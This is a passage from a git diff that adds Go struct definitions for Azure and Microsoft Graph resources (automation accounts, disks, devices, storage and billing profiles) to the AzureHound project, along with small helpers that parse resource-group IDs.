enums.ExternalAudienceScope `json:"externalAudience,omitempty"` + + // The automatic reply to send to the specified eternal audience. + ExternalReplyMessage string `json:"externalReplyMessage,omitempty"` + + // The automatic reply to send to the audience internal to the signed-in user's organization. + InternalReplyMessage string `json:"internalReplyMessage,omitempty"` + + // The date and time that automatic replies are set to end. + ScheduledEndDateTime DateTimeTimeZone `json:"scheduledEndDateTime,omitempty"` + + // The date and time that automatic replies are set to begin. + ScheduledStartDateTime DateTimeTimeZone `json:"scheduledStartDateTime,omitempty"` + + // Configuration status for automatic replies. + Status enums.AutoReplyStatus `json:"status,omitempty"` +} diff --git a/models/azure/automation_account.go b/models/azure/automation_account.go new file mode 100644 index 0000000..c952a38 --- /dev/null +++ b/models/azure/automation_account.go @@ -0,0 +1,52 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +// Mapped according to https://docs.microsoft.com/en-us/rest/api/automation/automation-account/get?tabs=HTTP#automationaccount +type AutomationAccount struct { + Entity + + Etag string `json:"etag,omitempty"` + Identity ManagedIdentity `json:"identity,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Properties AutomationAccountProperties `json:"properties,omitempty"` + SystemData AutomationAccountSystemData `json:"systemData,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s AutomationAccount) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s AutomationAccount) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/automation_account_properties.go b/models/azure/automation_account_properties.go new file mode 100644 index 0000000..e201a92 --- /dev/null +++ b/models/azure/automation_account_properties.go @@ -0,0 +1,34 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AutomationAccountProperties struct { + AutomationHybridServiceUrl string `json:"automationHybridServiceUrl,omitempty"` + CreationTime string `json:"creationTime,omitempty"` + Description string `json:"description,omitempty"` + DisableLocalAuth bool `json:"disableLocalAuth,omitempty"` + Encryption AutomationAccountEncryptionProperties `json:"encryption,omitempty"` + LastModifiedBy string `json:"lastModifiedBy,omitempty"` + LastModifiedTime string `json:"lastModifiedTime,omitempty"` + PrivateEndpointConnections []PrivateEndpointConnection `json:"privateEndpointConnections,omitempty"` + PublicNetworkAccess bool `json:"publicNetworkAccess,omitempty"` + Sku Sku `json:"sku,omitempty"` + State enums.AutomationAccountState `json:"state,omitempty"` +} diff --git a/models/azure/automation_account_system_data.go b/models/azure/automation_account_system_data.go new file mode 100644 index 0000000..4d05998 --- /dev/null +++ b/models/azure/automation_account_system_data.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AutomationAccountSystemData struct { + CreatedAt string `json:"createdAt,omitempty"` + CreatedBy string `json:"createdBy,omitempty"` + CreatedByType enums.AutomationAccountIdentityType `json:"createdByType,omitempty"` + LastModifiedAt string `json:"lastModifiedAt,omitempty"` + LastModifiedBy string `json:"lastModifiedBy,omitempty"` + LastModifiedByType enums.AutomationAccountIdentityType `json:"lastModifiedByType,omitempty"` +} diff --git a/models/azure/available_patch_summary.go b/models/azure/available_patch_summary.go new file mode 100644 index 0000000..e3a10fe --- /dev/null +++ b/models/azure/available_patch_summary.go @@ -0,0 +1,51 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Describes the properties of a virtual machine instance view for available patch summary. +type AvailablePatchSummary struct { + // The activity ID of the operation that produced this result. It is used to correlate across CRP and extension logs. + AssessmentActivityId string `json:"assessmentActivityId,omitempty"` + + // The number of critical or security patches that have been detected as available and not yet installed. + CriticalAndSecurityPatchCount int `json:"criticalAndSecurityPatchCount,omitempty"` + + // The errors that were encountered during execution of the operation. The details array contains the list of them. + Error ODataError `json:"error,omitempty"` + + // The UTC timestamp when the operation began. + LastModifiedTime string `json:"lastModifiedTime,omitempty"` + + // The number of all available patches excluding critical and security. + OtherPatchCount int `json:"otherPatchCount,omitempty"` + + // The overall reboot status of the VM. It will be true when partially installed patches require a reboot to + // complete installation but the reboot has not yet occurred. + RebootPending bool `json:"rebootPending,omitempty"` + + // The UTC timestamp when the operation began. + StartTime string `json:"startTime,omitempty"` + + // The overall success or failure status of the operation. It remains "InProgress" until the operation completes. + // At that point it will become "Unknown", "Failed", "Succeeded", or "CompletedWithWarnings." + Status enums.PatchStatus `json:"status,omitempty"` +} diff --git a/models/azure/azure_files_identity_based_authentication.go b/models/azure/azure_files_identity_based_authentication.go new file mode 100644 index 0000000..bb25abb --- /dev/null +++ b/models/azure/azure_files_identity_based_authentication.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AzureFilesIdentityBasedAuthentication struct { + ActiveDirectoryProperties ActiveDirectoryProperties `json:"activeDirectoryProperties,omitempty"` + DefaultSharePermission enums.DefaultSharePermission `json:"defaultSharePermission,omitempty"` + DirectoryServiceOptions enums.DirectoryServiceOptions `json:"directoryServiceOptions,omitempty"` +} + +type ActiveDirectoryProperties struct { + AccountType string `json:"accountType,omitempty"` + AzureStorageSid string `json:"azureStorageSid,omitempty"` + DomainGuid string `json:"domainGuid,omitempty"` + DomainName string `json:"domainName,omitempty"` + DomainSid string `json:"domainSid,omitempty"` + ForestName string `json:"forestName,omitempty"` + NetBiosDomainName string `json:"netBiosDomainName,omitempty"` + SamAccountName string `json:"samAccountName,omitempty"` +} diff --git a/models/azure/azure_storage_info_value.go b/models/azure/azure_storage_info_value.go new file mode 100644 index 0000000..6aeaa57 --- /dev/null +++ b/models/azure/azure_storage_info_value.go @@ -0,0 +1,29 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type AzureStorageInfoValue struct { + AccessKey string `json:"accessKey,omitempty"` + AccountName string `json:"accountName,omitempty"` + MountPath string `json:"mountPath,omitempty"` + ShareName string `json:"shareName,omitempty"` + State enums.AzureStorageState `json:"state,omitempty"` + Type enums.AzureStorageType `json:"type,omitempty"` +} diff --git a/models/azure/billing_profile.go b/models/azure/billing_profile.go new file mode 100644 index 0000000..d8d19e8 --- /dev/null +++ b/models/azure/billing_profile.go @@ -0,0 +1,40 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Specifies the billing related details of a Azure Spot VM or VMSS. +type BillingProfile struct { + + // Specifies the maximum price you are willing to pay for a Azure Spot VM/VMSS. This price is in US Dollars. + // This price will be compared with the current Azure Spot price for the VM size. Also, the prices are compared at + // the time of create/update of Azure Spot VM/VMSS and the operation will only succeed if the maxPrice is greater + // than the current Azure Spot price. + // + // The maxPrice will also be used for evicting a Azure Spot VM/VMSS if the current Azure Spot price goes beyond the + // maxPrice after creation of VM/VMSS. + // + // Possible values are: + // - Any decimal value greater than zero. Example: 0.01538 + // -1 – indicates default price to be up-to on-demand. + // + // You can set the maxPrice to -1 to indicate that the Azure Spot VM/VMSS should not be evicted for price reasons. + // Also, the default max price is -1 if it is not provided by you. + // + // Minimum api-version: 2019-03-01. + MaxPrice float64 `json:"maxPrice,omitempty"` +} diff --git a/models/azure/blob_restore_status.go b/models/azure/blob_restore_status.go new file mode 100644 index 0000000..8da46a8 --- /dev/null +++ b/models/azure/blob_restore_status.go @@ -0,0 +1,37 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type BlobRestoreStatus struct { + FailureReason string `json:"failureReason,omitempty"` + Parameters BlobRestoreParameters `json:"parameters,omitempty"` + RestoreId string `json:"restoreId,omitempty"` + Status enums.BlobRestoreProgressStatus `json:"status,omitempty"` +} + +type BlobRestoreParameters struct { + BlobRanges []BlobRestoreRange `json:"blobRanges,omitempty"` + TimeToRestore string `json:"timeToRestore,omitempty"` +} + +type BlobRestoreRange struct { + EndRange string `json:"endRange,omitempty"` + StartRange string `json:"startRange,omitempty"` +} diff --git a/models/azure/boot_diagnostics.go b/models/azure/boot_diagnostics.go new file mode 100644 index 0000000..532e481 --- /dev/null +++ b/models/azure/boot_diagnostics.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type BootDiagnotics struct { + // Whether boot diagnostics should be enabled on the virtual machine. + Enabled bool `json:"enabled,omitempty"` + + // Uri of the storage account to use for placing the console output and screenshot. + // If storageUri is not specified while enabling boot diagnostics, managed storage will be used. + StorageUri string `json:"storageUri,omitempty"` +} diff --git a/models/azure/boot_diagnostics_instance_view.go b/models/azure/boot_diagnostics_instance_view.go new file mode 100644 index 0000000..997c782 --- /dev/null +++ b/models/azure/boot_diagnostics_instance_view.go @@ -0,0 +1,33 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The instance view of a virtual machine boot diagnostics. +type BootDiagnoticsInstanceView struct { + // The console screenshot blob URI. + // NOTE: This will not be set if boot diagnostics is currently enabled with managed storage. + ConsoleScreenshotBlobUri string `json:"consoleScreenshotBlobUri,omitempty"` + + // The serial console log blob Uri. + // NOTE: This will not be set if boot diagnostics is currently enabled with managed storage. + SerialConsoleLogBlobUri string `json:"serialConsoleLogBlobUri,omitempty"` + + // The boot diagnostics status information for the VM. + // NOTE: It will be set only if there are errors encountered in enabling boot diagnostics. + Status InstanceViewStatus `json:"status,omitempty"` +} diff --git a/models/azure/capacity_reservation_profile.go b/models/azure/capacity_reservation_profile.go new file mode 100644 index 0000000..5d5325d --- /dev/null +++ b/models/azure/capacity_reservation_profile.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The parameters of a capacity reservation profile. +type CapacityReservationProfile struct { + // Specifies the capacity reservation group resource id that should be used for allocating the virtual machine or + // scaleset vm instances provided enough capacity has been reserved. Please refer to + // https://aka.ms/CapacityReservation for more details. + CapacityReservationGroup SubResource `json:"capacityReservationGroup,omitempty"` +} diff --git a/models/azure/cloning_info.go b/models/azure/cloning_info.go new file mode 100644 index 0000000..8d42ec0 --- /dev/null +++ b/models/azure/cloning_info.go @@ -0,0 +1,32 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +type CloningInfo struct { + AppSettingsOverrides interface{} `json:"appSettingsOverrides,omitempty"` + CloneCustomHostNames bool `json:"cloneCustomHostNames,omitempty"` + CloneSourceControl bool `json:"cloneSourceControl,omitempty"` + ConfigureLoadBalancing bool `json:"configureLoadBalancing,omitempty"` + CorrelationId string `json:"correlationId,omitempty"` + HostingEnvironment string `json:"hostingEnvironment,omitempty"` + Overwrite bool `json:"overwrite,omitempty"` + SourceWebAppId string `json:"sourceWebAppId,omitempty"` + SourceWebAppLocation string `json:"sourceWebAppLocation,omitempty"` + TrafficManagerProfileId string `json:"trafficManagerProfileId,omitempty"` + TrafficManagerProfileName string `json:"trafficManagerProfileName,omitempty"` +} diff --git a/models/azure/common.go b/models/azure/common.go new file mode 100644 index 0000000..5eaeb19 --- /dev/null +++ b/models/azure/common.go @@ -0,0 +1,45 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "encoding/json" + +type Response struct { + Context string `json:"@odata.context,omitempty"` + Count int `json:"@odata.count,omitempty"` + NextLink string `json:"@odata.nextLink,omitempty"` + Value []json.RawMessage `json:"value"` +} + +type ErrorResponse struct { + Error ODataError `json:"error"` +} + +type ErrorAdditionalInfo struct { + Info map[string]string `json:"info,omitempty"` + Type string `json:"type,omitempty"` +} + +type ODataError struct { + AdditionalInfo []ErrorAdditionalInfo `json:"additionalInfo,omitempty"` + Code string `json:"code"` + Details []ODataError `json:"details,omitempty"` + Message string `json:"message"` + InnerError *ODataError `json:"innererror,omitempty"` + Target string `json:"target,omitempty"` +} diff --git a/models/azure/connection_item_properties.go b/models/azure/connection_item_properties.go new file mode 100644 index 0000000..a691f0e --- /dev/null +++ b/models/azure/connection_item_properties.go @@ -0,0 +1,31 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ConnectionItemProperties struct { + //Properties of the private endpoint object. + PrivateEndpoint PrivateEndpoint `json:"privateEndpoint,omitempty"` + + // Approval state of the private link connection. + PrivateLinkServiceConnectionState PrivateLinkServiceConnectionState `json:"privateLinkServiceConnectionState,omitempty"` + + // Provisioning state of the private endpoint connection. + ProvisioningState enums.EndpointProvisioningState `json:"provisioningState,omitempty"` +} diff --git a/models/azure/connection_string_info.go b/models/azure/connection_string_info.go new file mode 100644 index 0000000..bd3f37d --- /dev/null +++ b/models/azure/connection_string_info.go @@ -0,0 +1,26 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "github.com/bloodhoundad/azurehound/v2/enums" + +type ConnStringInfo struct { + ConnectionString string `json:"connectionString,omitempty"` + Name string `json:"name,omitempty"` + Type enums.ConnectionStringType `json:"type,omitempty"` +} diff --git a/models/azure/container_registry.go b/models/azure/container_registry.go new file mode 100644 index 0000000..d476d48 --- /dev/null +++ b/models/azure/container_registry.go @@ -0,0 +1,49 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import "strings" + +// Mapped according to https://learn.microsoft.com/en-us/rest/api/containerregistry/registries/get?tabs=HTTP#registry +type ContainerRegistry struct { + Entity + + Identity ManagedIdentity `json:"identity,omitempty"` + Location string `json:"location,omitempty"` + Name string `json:"name,omitempty"` + Tags map[string]string `json:"tags,omitempty"` + Type string `json:"type,omitempty"` +} + +func (s ContainerRegistry) ResourceGroupName() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 4 { + return parts[4] + } else { + return "" + } +} + +func (s ContainerRegistry) ResourceGroupId() string { + parts := strings.Split(s.Id, "/") + if len(parts) > 5 { + return strings.Join(parts[:5], "/") + } else { + return "" + } +} diff --git a/models/azure/data_disk.go b/models/azure/data_disk.go new file mode 100644 index 0000000..5c77116 --- /dev/null +++ b/models/azure/data_disk.go @@ -0,0 +1,95 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes a data disk. +type DataDisk struct { + // Specifies the caching requirements. + // Possible values are: + // None + // ReadOnly + // ReadWrite + // + // Default: None for Standard storage. ReadOnly for Premium storage + Caching string `json:"caching,omitempty"` + + // Specifies how the virtual machine should be created. + // Possible values are: + // Attach - This value is used when you are using a specialized disk to create the virtual machine. + // FromImage - This value is used when you are using an image to create the virtual machine. If you are using a platform image, you also use the imageReference element described above. If you are using a marketplace image, you also use the plan element previously described. + CreateOption string `json:"createOption,omitempty"` + + // Specifies whether data disk should be deleted or detached upon VM deletion. + // Possible values: + // Delete - If this value is used, the data disk is deleted when VM is deleted. + // Detach - If this value is used, the data disk is retained after VM is deleted. + // The default value is set to detach + DeleteOption string `json:"deleteOption,omitempty"` + + // Specifies the detach behavior to be used while detaching a disk or which is already in the process of detachment + // from the virtual machine. + // Supported values: ForceDetach + // + // ForceDetach is applicable only for managed data disks. If a previous detachment attempt of the data disk did not + // complete due to an unexpected failure from the virtual machine and the disk is still not released then use + // force-detach as a last resort option to detach the disk forcibly from the VM. All writes might not have been + // flushed when using this detach behavior. + // + // This feature is still in preview mode and is not supported for VirtualMachineScaleSet. To force-detach a data disk + // update toBeDetached to 'true' along with setting detachOption: 'ForceDetach'. + DetachOption string `json:"detachOption,omitempty"` + + // Specifies the Read-Write IOPS for the managed disk when StorageAccountType is UltraSSD_LRS. + // Returned only for VirtualMachine ScaleSet VM disks. Can be updated only via updates to the + // VirtualMachine Scale Set. + DiskIOPSReadWrite int `json:"diskIOPSReadWrite,omitempty"` + + // Specifies the bandwidth in MB per second for the managed disk when StorageAccountType is UltraSSD_LRS. + // Returned only for VirtualMachine ScaleSet VM disks. Can be updated only via updates to the + // VirtualMachine Scale Set. + DiskMBpsReadWrite int `json:"diskMBpsReadWrite,omitempty"` + + // Specifies the size of an empty data disk in gigabytes. + // This element can be used to overwrite the size of the disk in a virtual machine image. + // This value cannot be larger than 1023 GB + DiskSizeGB int `json:"diskSizeGB,omitempty"` + + // The source user image virtual hard disk. The virtual hard disk will be copied before being attached to the + // virtual machine. If SourceImage is provided, the destination virtual hard drive must not exist. + Image VirtualHardDisk `json:"image,omitempty"` + + // Specifies the logical unit number of the data disk. + // This value is used to identify data disks within the VM and therefore must be unique for each data disk attached + // to a VM. + Lun int `json:"lun,omitempty"` + + // The managed disk parameters. + ManagedDisk ManagedDiskParameters `json:"managedDisk,omitempty"` + + // The disk name. + Name string `json:"name,omitempty"` + + // Specifies whether the data disk is in process of detachment from the VirtualMachine/VirtualMachineScaleset. + ToBeDetached bool `json:"toBeDetached,omitempty"` + + // The virtual hard disk. + Vhd VirtualHardDisk `json:"vhd,omitempty"` + + // Specifies whether writeAccelerator should be enabled or disabled on the disk. + WriteAcceleratorEnabled bool `json:"writeAcceleratorEnabled,omitempty"` +} diff --git a/models/azure/datetime_timezone.go b/models/azure/datetime_timezone.go new file mode 100644 index 0000000..426ef21 --- /dev/null +++ b/models/azure/datetime_timezone.go @@ -0,0 +1,27 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// Describes the date, time and time zone of a point in time. +type DateTimeTimeZone struct { + // A single point of time in a combined date and time representation `{date}T{time} + DateTime string `json:"dateTime,omitempty"` + + // Represents a time zone + TimeZone string `json:"timeZone,omitempty"` +} diff --git a/models/azure/descendant-info.go b/models/azure/descendant-info.go new file mode 100644 index 0000000..7f2d400 --- /dev/null +++ b/models/azure/descendant-info.go @@ -0,0 +1,62 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +// The properties of the parent management group. +type DescendantParentGroupInfo struct { + // The fully qualified ID for the parent management group. + // + // For example: + // - /providers/Microsoft.Management/managementGroups/0000000-0000-0000-0000-000000000000 + Id string `json:"id,omitempty"` +} + +// DescendantInfoProperties describes the properties of the management group descendant. +type DescendantInfoProperties struct { + // The friendly name of the management group. + DisplayName string `json:"display_name,omitempty"` + + // The properties of the parent management group. + Parent DescendantParentGroupInfo `json:"parent,omitempty"` +} + +// DescendantInfo is a management group descendant. +type DescendantInfo struct { + // The fully qualified ID for the descendant. + // + // For example: + // - /providers/Microsoft.Management/managementGroups/0000000-0000-0000-0000-000000000000 + // - /subscriptions/0000000-0000-0000-0000-000000000000 + Id string `json:"id,omitempty"` + + // The name of the descendant. + // + // For example: + // - 00000000-0000-0000-0000-000000000000 + Name string `json:"name,omitempty"` + + // The properties of the management group descendant. + Properties DescendantInfoProperties `json:"properties,omitempty"` + + // The type of the resource. + // + // For example: + // - Microsoft.Management/managementGroups + // - /subscriptions + Type string `json:"type,omitempty"` +} diff --git a/models/azure/device.go b/models/azure/device.go new file mode 100644 index 0000000..64fffe0 --- /dev/null +++ b/models/azure/device.go @@ -0,0 +1,131 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package azure + +import ( + "github.com/bloodhoundad/azurehound/v2/enums" +) + +// Represents a device registered in the organization. Devices are created in the cloud using the Device Registration +// Service or by Intune. They're used by conditional access policies for multi-factor authentication. These devices can +// range from desktop and laptop machines to phones and tablets. +// For more detail see https://docs.microsoft.com/en-us/graph/api/resources/device?view=graph-rest-1.0 +type Device struct { + DirectoryObject + + // true if the account is enabled; otherwise, false. Required. Default is true. + // Supports $filter (eq, ne, NOT, in). + // Only callers in Global Administrator and Cloud Device Administrator roles can set this property. + AccountEnabled bool `json:"accountEnabled,omitempty"` + + // For internal use only. Not nullable. Supports $filter (eq, NOT, ge, le). + AlternativeSecurityIds []AlternativeSecurityId `json:"alternativeSecurityIds,omitempty"` + + // The timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only. + // Supports $filter (eq, ne, NOT, ge, le) and $orderBy. + ApproximateLastSignInDateTime string `json:"approximateLastSignInDateTime,omitempty"` + + // The timestamp when the device is no longer deemed compliant. + // The timestamp type represents date and time information using ISO 8601 format and is always in UTC time. + // For example, midnight UTC on Jan 1, 2014 is 2014-01-01T00:00:00Z. Read-only. + ComplianceExpirationDateTime string `json:"complianceExpirationDateTime,omitempty"` + + // Unique identifier set by Azure Device Registration Service at the time of registration. + // Supports $filter (eq, ne, NOT, startsWith). + DeviceId string `json:"deviceId,omitempty"` + + // For internal use only. Set to null. + DeviceMetadata string `json:"deviceMetadata,omitempty"` + + // For internal use only. + DeviceVersion int32 `json:"deviceVersion,omitempty"` + + // The display name for the device. + // Required. + // Supports $filter (eq, ne, NOT, ge, le, in, startsWith), $search, and $orderBy. + 